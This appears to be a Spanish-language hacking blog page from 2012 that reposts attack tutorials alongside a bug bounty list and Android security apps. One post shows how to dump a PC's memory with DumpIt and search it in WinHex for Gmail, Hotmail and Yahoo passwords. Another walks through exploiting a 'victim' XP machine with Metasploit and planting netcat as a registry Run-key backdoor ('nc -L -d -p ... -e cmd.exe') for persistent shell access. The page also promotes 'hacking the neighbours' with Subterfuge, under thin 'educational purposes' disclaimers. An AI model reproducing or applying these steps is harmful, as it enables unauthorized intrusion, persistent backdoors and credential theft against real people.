Vistas de página en total
miércoles, 2 de enero de 2013
Espiando a nuestros Vecinos y Hackeandole el Sistema mediante Subterfuge
UTILIZANDO SUBTERFUGE PARA HACER HACKING A LOS VECINOS, ESTE TUTO ES SOLO CON FINES EDUCATIVOS, LO TOME DE CALEBBUCKER.BLOGSPOT.COM, DANDO CLICK AQUI LO PODRAS VER
TUTORIALES DE BACKTRACK 5
LOS TUTOS DE BACKTRACK 5 LOS PUEDEN ENCONTRAR AQUI, SON DE UTILIDAD, PRACTIQUEN.........
Crypt4you – Aprende criptografía y seguridad informática de otra forma y GRATIS
Defacement como herramienta de publicidad a nivel gubernamental
ESTA NOTA FUE TOMADA DE DRAGONJAR.ORG Y PUEDEN VERLA COMPLETA AQUI
PENTEST MAGAZINE: Metasploit Framework Guide for PenTesters
REVISTA DE PENTEST, PUEDEN DESCARGARLA DESDE AQUI, ESTA NOTA FUE TOMADA DESDE CALEBBUCKER.BLOGSPOT.COM.
lunes, 31 de diciembre de 2012
VOLCADO DE MEMORIA RAM PARA EXTRACCION DE CONTRASEÑAS DE HOTMAIL, YAHOO Y GMAIL
lo primero que debemos hacer es descargar las aplicaciones para dicho fin, para descargar DUMPIT, lo haremos desde aqui y para descargar el WinHex lo haremos desde aqui.
despues de haberlos decargado, los copiaremos en el escritorio y los extraeremos, ya que vienen compilados en un .rar.
despues de haberlos extraido entraremos en la carpeta de DUMPIT, ahi encontraremos en archivo .exe
este archivo lo copiaremos en el escritorio y posteriormente lo ejecutaremos.
cuando lo ejecutemos nos mostrara un cuadro como este.
despues de haberlos decargado, los copiaremos en el escritorio y los extraeremos, ya que vienen compilados en un .rar.
despues de haberlos extraido entraremos en la carpeta de DUMPIT, ahi encontraremos en archivo .exe
este archivo lo copiaremos en el escritorio y posteriormente lo ejecutaremos.
cuando lo ejecutemos nos mostrara un cuadro como este.
aqui daremos "si" que lo denotaremos con la letra"y", luego daremos enter.
cuando le demos enter nos aparecera algo asi.
como podemos ver, esta consola esta procesando la información que encontró en la memoria, para luego entregárnosla en un archivo. raw.
en el escritorio se creara un archivo como este, con el nombre de su equipo.
este archivo será el que analizaremos con el WinHex.
para examinar el archivo con el WinHex, vamos a la carpeta WinHex, y ejecutamos el aplicativo.
cuando lo ejecutamos nos aparecerá la interfaz de WinHex.
esta es la parte superior de la interfaz del WinHex, como podemos ver hay menú completo con múltiples opciones, para este caso usaremos solo 3.
la primera opción a usar es la de la pestaña FILE, daremos click en ella y luego en OPEN, cuando le demos click en OPEN nos abrirá un subcuadro en el que buscaremos la ruta en la cual quedo el archivo generado por el DUMPIT, cuando tengamos ubicado el archivo, lo seleccionaremos y le daremos click en abrir, cuando el archivo se encuentre cargado en el DUMPIT, vamos a la pestaña VIEW, ahi seleccionaremos la casilla de TEXT DISPLAY ONLY, luego daremos click en SEARCH y nos paracera algo asi.
en la parte de arriba colocaremos la palabra que deseamos buscar, en este caso buscaremos la palabra Passwd, dejamos las casillas por default y damos click en OK, después de darle click en OK, WinHex comenzara a cargar una barra, lo cual nos indica que esta realizando la búsqueda de la palabra en el archivo.
cuando complete la búsqueda, empezaremos a ver cada uno de los resultados.
en este caso me loguee en GMAIL.
después de completar la búsqueda, nos mostrara el numero de aciertos.
los aciertos nos aparecerán en una lista así.
podemos empezar a ver uno por uno, y cuando nos aparezca algo como el cuadro que sigue, ahí estará la contraseña.
viernes, 21 de diciembre de 2012
PROTEGE TUS CONTRASEÑAS
si quieres saber mas sobre como proteger tus contraseñas visita el siguiente link haciendo click AQUI
Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria
EL SIGUIENTE LINK , TOMADO DE BLACKPLOIT.COM SOLO CON FINES EDUCATIVOS.
http://www.blackploit.com/2012/12/obtener-contrasenas-de-hotmail-yahoo.html
PARA VER EL VIDEO DAR CLICK AQUI
http://www.blackploit.com/2012/12/obtener-contrasenas-de-hotmail-yahoo.html
PARA VER EL VIDEO DAR CLICK AQUI
jueves, 13 de diciembre de 2012
BACKDORIZANDO XP DESDE BACKTRACK CON MSF
lo primero que necesitamos saber es la IP de la victima, después de saber la IP, nos vamos a BACKTRACK y haremos un escaneo con nmap, haremos un escaneo silencioso que nos diga cual sistema operativo corre la victima, entonces, el escaneo lo haremos así:
nmap -sS -O (IP de la victima)
como podemos ver en la imagen, la IP de la victima (xp) es 192.168.1.5
nmap -sS -O (IP de la victima)
como podemos ver en la imagen, la IP de la victima (xp) es 192.168.1.5
el paso a seguir es copiar en el escritorio de BACKTRACK, el archivo que nos creara la puerta trasera (BACKDOOR), el archivo se llama nc.exe (nc es la abreviatura de netcat).
ahora si, procederemos con nuesttro escaneo.
el escaneo informa, sobre los puertos abiertos en la victima y el sistema operativo que esta corriendo.
ahora ejecutaremos METASPLOIT en una terminal, digitando el comando #msfconsole, para poder cargar el exploit que usaremos.
teniendo ya seleccionado nuestro exploit, pasaremos a configurar un PAYLOAD con su debida configuración:
1. LHOST (ip local)
2. RHOST (ip remota)
3. exploit (lanzarlo)
después de haber lanzado el exploit, vemos que METERPRETER nos muestra una sesión abierta en la victima.
ahora, mediante METERPRETER subiremos el archivo nc.exe, que tenemos copiado en el escritorio de BACKTRACK a la carpeta system32 de la victima.
ahora iremos a los registros de WINDOWS para ver que esta ejecutando actualmente.
esto lo haremos digitando la siguiente linea de comandos.
>reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
ahora vamos a alterar los valores de los registros de WINDOWS en H_KEY_LOCAL_MACHINE (HKLM), y esto lo haremos con el siguiente comando.
>reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c: \\WINDOWS\\system32\\nc.exe "-L -d -p (puerto) -e cmd.exe".
ahora correremos nuevamente el comando:
reg enumkey -kkHKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
para verificar que el BACKDOOR si quedo en los registros de HKLM.
efectivamente, el BACKDOOR está en los registros, ahora lo que haremos será reiniciar la maquina de la victima (xp), lo cual haremos con el comando >reboot.
vemos que esta reiniciando la maquina de la victima.
ahora solo queda abrir una terminal en BACKTRACK y digitar el siguiente comando.
#nc (IP de la victima) (puerto)
#nc 192.168.1.5 1111
con esto ya estamos dentro cada vez que la victima inicie sesión!!!!!
miércoles, 12 de diciembre de 2012
Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)
SOLO CON LA FIRME INTENSIÓN DE DIFUNDIR INFORMACION, HE TOMADO LA INFO DEL BLOG DE http://calebbucker.blogspot.com
Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: Google, Facebook, Mozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas.
Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.
BUG BOUNTY VULNERABILIDADES EN APLICACIONES WEB:
Mozilla
Google
Facebook
Paypal
Etsy
Wordpress
Commonsware
CCBill
Vark
Windthorstisd
BUG BOUNTY VULNERABILIDADES EN PRODUCTOS:
Mozilla
Google Chrome
Zero Day Initiative
Barracuda
Artifex Software
Hex Rays
Ardour
Piwik
HALL OF FAME (SALON DE LA FAMA):
Microsoft
Apple
Adobe
IBM
Twitter
Dropbox
Cisco
Moodle
- http://moodle.org/security
Drupal
Oracle
Symantec
Ebay
Twilio
37 Signals
Salesforce
Reddit
Github
Ifixit
Constant Contact
Zeggio
Simplify
Team Unify
Skoodat
Relaso
Moduscsr
Cloudnetz
Emptrust
Apriva
Amazon
SqaureUp
G-Sec
Xen
Engine Yard
Lastpass
RedHat
Acquia
Mahara
Zynga
Risk.io
Opera
Owncloud
Scorpion Soft
Norada
Cpaperless
Wizehive
Tuenti
Nokia Siemens
Sound Cloud
Puppetlabs
Neohapsis
HTC
Estas son las empresas que nos pueden considerar un pago por reportarles los fallos de seguridad que se encuentran en sus sitios webs y productos.
Les mostrare una vulnerabilidad (XSS) que encontre en Google Play la cual fue respectivamente reportada y aceptada.
martes, 11 de diciembre de 2012
ENTRADA AL BARCAMP SE MEDELLIN 2012
[PAPER] PENETRATION TESTING EITH BACKTRACK
en el siguiente link encontraran una guía para un TEST DE PENETRACIÓN con BCKTRACK
CLICK AQUI PARA DESCARGAR PDF
TOMADO DE http://www.blackploit.com
CLICK AQUI PARA DESCARGAR PDF
TOMADO DE http://www.blackploit.com
APLICACIONES DE SEGURIDAD PARA ANDROID
Hoy en día le estamos dando muchas utilidades a nuestro Smartphone, por lo cual esté administra y almacena casi la misma o más información sensible que nuestros mismos computadores. A esto sumemosle el crecimiento exponencial de Android y todos los nuevos Malwares que se están diseñando para una plataforma que está muy lejos de acabarse.
Es por ello que se hace imprescindible secularizar nuestro dispositivos y recientemente en blog de kaspersky han publicado lo que según ellos son las 20 mejores aplicaciones de seguridad para Android:
- mSecure Password Manager: (9,99 US$) utiliza la tecnología de cifrado para proteger todos los datos de tu monedero digital, inclusive los nombres de usuarios, las contraseñas y números de cuenta. Además, realiza una copia de seguridad automática en la tarjeta SD de los datos cifrados y contiene un generador de contraseñas para crear códigos de acceso seguros y complejos.
- SplashID Safe: (9,99 US$) los piratas informáticos están al acecho de las contraseñas y credenciales de los usuarios para poder acceder a sus cuentas e información. Con esta aplicación para Android, tenemos todos nuestros datos guardados en una caja fuerte: contraseñas, pin, números de las tarjetas de crédito… Puedes, además, usar SplashID Safe para realizar una copia de seguridad de tu información, sincronizando el dispositivo Android con tu equipo PC o Mac.
- SeekDroid AntiTheft & Security: (2,99 US$) esta app nos ayuda a localizar nuestro dispositivo en caso de pérdida. El rastreo GPS nos permite encontrarlo de forma rápida y ayuda a prevenir que nos rastreen nuestro teléfono.
- Safe Notes: (FREE!) nuestra información confidencial no se limita a contraseñas o nombres de usuarios. Nuestros dispositivos pueden contener datos realmente importantes en forma de notas, por ejemplo. Con Safe Notes podrás cifrar dicha información, accediendo a ella a través de un pin o pregunta secreta.
- B-Secure Tracker: (FREE!) en caso de pérdida o robo, podemos usar nuestros dispositivos en contra de los hackers. Esta aplicación nos proporcionar un portal remoto donde localizar nuestro dispositivo en Google Maps. Además, puede hacer fotos y grabar sonidos del ladrón; enviándote dichos archivos a través de correo electrónico.
- Secure Settings: (FREE!) este plugin de Android nos ofrece una interfaz donde restablecer nuestro código de acceso así como activar o desactivar ADB y GPS.
- Remote Security: (1,16 US$) con esta aplicación puedes bloquear tu dispositivo de forma remota, activar una alarma de robo de tu teléfono, hacer que éste llame a un número predeterminado o eliminar datos confidenciales de tu dispositivo (como SMS).
- eWallet: (9,99 US$) proporciona una mayor seguridad para las contraseñas y credenciales de los dispositivos Android. eWallet no sólo protege contraseñas sino cualquier dato confidencial.
- GadgetTrak Mobile Security: (FREE!) es una app tanto para usuarios como para entidades empresariales, la cual ofrece una protección múltiple para nuestros dispositivos Android. Los ajustes de seguridad y software estarán a salvo y se avisará de cualquier cambio no autorizado en la tarjeta SIM. Asimismo, incluye rastreo GPS, eliminación de datos de forma remota y funcionalidades de cifrado y copia de seguridad.
- SPB Wallet: (7,00 US$) aplicación de seguridad que almacena y cifra contraseñas y datos de tarjetas de crédito, sincronizándose de forma segura con otros dispositivos y proporcionando protección anti-phishing.
- Password Box: (2,99 US$) si gestionar tus contraseñas te trae quebraderos de cabeza, esta aplicación puede ayudarte al respecto. Password Box te proporciona un almacenamiento seguro para las credenciales de tu dispositivo, realizando, automáticamente, una copia de seguridad cifrada en una tarjeta SD.
- Perfect App Protector Pro: (FREE!) si estás preocupado por los datos de acceso que usas en las diferentes aplicaciones –banca online, email, redes sociales- esta aplicación de seguridad te permite seleccionar la app que quieras y protegerla con una contraseña diferente. Igualmente, se puede proteger otros datos como fotos e incluso la cámara del dispositivo.
- AirCover Security Suite: (FREE!) esta aplicación de seguridad ofrece seis servicios para proteger los datos de tu familia. Se pueden establecer alertas para situaciones de emergencia. Incluye, a su vez, protección frente a pérdida (GPS, bloqueo remoto…) y protección y copia de seguridad en la nube.
- Pocket: (FREE!) toda la información confidencial –número de cuentas, contraseñas- nunca debería almacenarse en las notas o contactos de tus dispositivo. Esta app proporciona un lugar seguro donde esconder todos esta información de las miradas indiscretas. Se cifra la información y podemos acceder a ella a través de una contraseña maestra. Además, realiza una copia de seguridad automática en Dropbox.
- DataVault Password Manager: (9,99 US$) muestra carpetas similares a Windows Explorer, lo que nos facilita el manejo de la app. La aplicación crea contraseñas complejas y nos muestra la fortaleza de las mismas. Junto con la funcionalidad de cifrado y copia de seguridad en una tarjeta SD, el usuario también puede establecer un tiempo de espiración y un número de intentos determinado para las contraseñas.
- BioWallet Signature: (FREE!) utiliza tus contraseñas manuscritas y sólo podrás acceder a los datos guardados firmando sobre la pantalla del dispositivo.
- BoxCryptor: (FREE!) aplicaciones como Dropbox o Google Drive son realmente populares entre los usuarios. BoxCryptor añade un nivel extra de seguridad, cifrando los archivos guardados en los servicios de la nube.
- CryptRoll Secure Notepad: (FREE!) CryptRoll no sólo protege las notas de tu dispositivo Android sino que almacena los archivos cifrados en Google Docs. Asimismo, brinda la oportunidad de cifrar los sms y emails.
- Seal App Locker: (2,59 US$) protege cualquier aplicación ayudándote a crear contraseñas complejas e identificando posibles apps maliciosas.
- App Protector Pro: (1,50 US$) ¿te preocupa la seguridad de tus mensajes de texto, contactos o fotos? Con esta aplicación, puedes usar una contraseña maestra en cualquier app de mensajería que utilices
Suscribirse a:
Entradas (Atom)


























